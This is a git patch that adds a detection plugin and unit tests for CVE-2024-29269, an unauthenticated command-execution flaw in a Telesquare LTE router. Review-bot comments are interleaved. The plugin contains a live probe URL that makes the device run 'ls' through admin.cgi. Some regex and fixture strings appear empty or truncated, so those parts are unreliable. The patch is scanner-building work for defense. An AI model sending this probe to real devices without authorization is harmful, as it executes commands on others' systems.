From 67a414e199e1691854df8077aa3bbeb16f74de36 Mon Sep 17 00:00:00 2001
From: Mohamed Benchikh
Date: Mon, 15 Apr 2024 14:16:24 +0100
Subject: [PATCH] Add detection for CVE-2024-29269
---
agent/exploits/cve_2024_29269.py | 36 ++++++++++++
tests/exploits/cve_2024_29269_test.py | 85 +++++++++++++++++++++++++++
2 files changed, 121 insertions(+)
create mode 100644 agent/exploits/cve_2024_29269.py
create mode 100644 tests/exploits/cve_2024_29269_test.py
diff --git a/agent/exploits/cve_2024_29269.py b/agent/exploits/cve_2024_29269.py
new file mode 100644
index 00000000..749b8973
--- /dev/null
+++ b/agent/exploits/cve_2024_29269.py
@@ -0,0 +1,36 @@
+"""Agent Asteroid implementation for CVE-2024-29269"""
+
+import re
+from agent import definitions
+from agent import exploits_registry
+from agent.exploits import webexploit
+
+VULNERABILITY_TITLE = (
+ "Telesquare TLR-2005KSH Unauthorized Remote Command Execution Vulnerability"
+)
+VULNERABILITY_REFERENCE = "CVE-2024-29269"
+VULNERABILITY_DESCRIPTION = (
+ "Telesquare Tlr-2005Ksh is a Sk Telecom Lte router from South Korea's Telesquare company.Telesquare TLR-2005Ksh "
+ "versions 1.0.0 and 1.1.4 have an unauthorized remote command execution vulnerability. An attacker can exploit "
+ "this vulnerability to execute system commands without authorization through the Cmd parameter and obtain server "
+ "permissions."
+)
+RISK_RATING = "CRITICAL"
+
+
+@exploits_registry.register
+class CVE202429269Exploit(webexploit.WebExploit):
+ accept_request = definitions.Request(method="GET", path="/")
+ check_request = definitions.Request(
+ method="GET", path="/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls"
+ )
+ accept_pattern = re.compile("TLR-2005KSH")
+ match_pattern = re.compile(
+ ""
+ )
+ metadata = definitions.VulnerabilityMetadata(
+ title=VULNERABILITY_TITLE,
+ description=VULNERABILITY_DESCRIPTION,
+ reference=VULNERABILITY_REFERENCE,
+ risk_rating=RISK_RATING,
+ )
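Review bot: `match_pattern` is shown as `re.compile("")`, and an empty pattern matches every response body, so any host whose landing page contains `TLR-2005KSH` would be reported whatever `admin.cgi` returns. The literal looks like it lost its markup when this page was rendered, so this may not be what was committed. If the real pattern is present, it should key on something only the command-result wrapper contains and be written as a raw string. The class also has no docstring; I would add one saying that `accept_request` fingerprints the landing page and that `check_request` is an active probe that asks the device to run `ls`, so a hit presumably means the command endpoint answered without credentials.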
diff --git a/tests/exploits/cve_2024_29269_test.py b/tests/exploits/cve_2024_29269_test.py
new file mode 100644
index 00000000..8b447b82
--- /dev/null
+++ b/tests/exploits/cve_2024_29269_test.py
@@ -0,0 +1,85 @@
+"""Unit tests for Agent Asteroid: CVE-2024-29269"""
+
+import requests_mock as req_mock
+
+from agent import definitions
+from agent.exploits import cve_2024_29269
+
+
+def testCVE202429269_whenVulnerable_reportFinding(
+ requests_mock: req_mock.mocker.Mocker,
+) -> None:
+ """CVE-2024-29269 unit test: case when target is vulnerable."""
+ requests_mock.get(
+ "http://localhost:80/",
+ text="Login to TLR-2005KSH",
+ status_code=200,
+ )
+ requests_mock.get(
+ "http://localhost:80/cgi-bin/admin.cgi?Command=sysCommand&Cmd=ls",
+ text=(
+ '\n'
+ "\n"
+ "\n"
+ "\n"
+ "\n"
+ "\n"
+ "\n"
+ "\n"
+ "\n"
+ "\n"
+ "\n"
+ ""
+ ),
+ status_code=200,
+ )
+ exploit_instance = cve_2024_29269.CVE202429269Exploit()
+ target = definitions.Target("http", "localhost", 80)
+
+ accept = exploit_instance.accept(target)
+ vulnerabilities = exploit_instance.check(target)
+
+ assert accept is True
+ vulnerability = vulnerabilities[0]
+ assert (
+ vulnerability.entry.title
+ == "Telesquare TLR-2005KSH Unauthorized Remote Command Execution Vulnerability"
+ )
+ assert vulnerability.technical_detail == (
+ "http://localhost:80 is vulnerable to CVE-2024-29269, Telesquare "
+ "TLR-2005KSH Unauthorized Remote Command Execution Vulnerability"
+ )
+
+
+def testCVE202429269_whenSafe_reportNothing(
+ requests_mock: req_mock.mocker.Mocker,
+) -> None:
+ """CVE-2024-29269 unit test: case when target is safe."""
+ exploit_instance = cve_2024_29269.CVE202429269Exploit()
+ requests_mock.get(
+ "http://localhost:80/",
+ text="Login to TLR-2005KSH",
+ status_code=200,
+ )
+ requests_mock.get(
+ "http://localhost:80/cgi-bin/admin.cgi",
+ text="",
+ status_code=200,
+ )
+ target = definitions.Target("http", "localhost", 80)
+
+ accept = exploit_instance.accept(target)
+ vulnerabilities = exploit_instance.check(target)
+
+ assert accept is True
+ assert len(vulnerabilities) == 0
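Review bot: The safe case in `testCVE202429269_whenSafe_reportNothing` only mocks an empty 200 body for `admin.cgi`, which is the easiest input for any pattern to reject. A patched or differently configured device is more likely to answer with a login page, an error document or a 401/403, so I would add one case with a non-empty body that lacks the command output and one with a non-200 status, both asserting `len(vulnerabilities) == 0`. A third case where the landing page does not contain `TLR-2005KSH` and `accept` is `False` would pin the fingerprint gate. The vulnerable-response fixture is shown here as newline-only strings and the hunk holds fewer lines than its `+1,85` header declares, so part of it appears to have been lost in rendering and cannot be reviewed from this page.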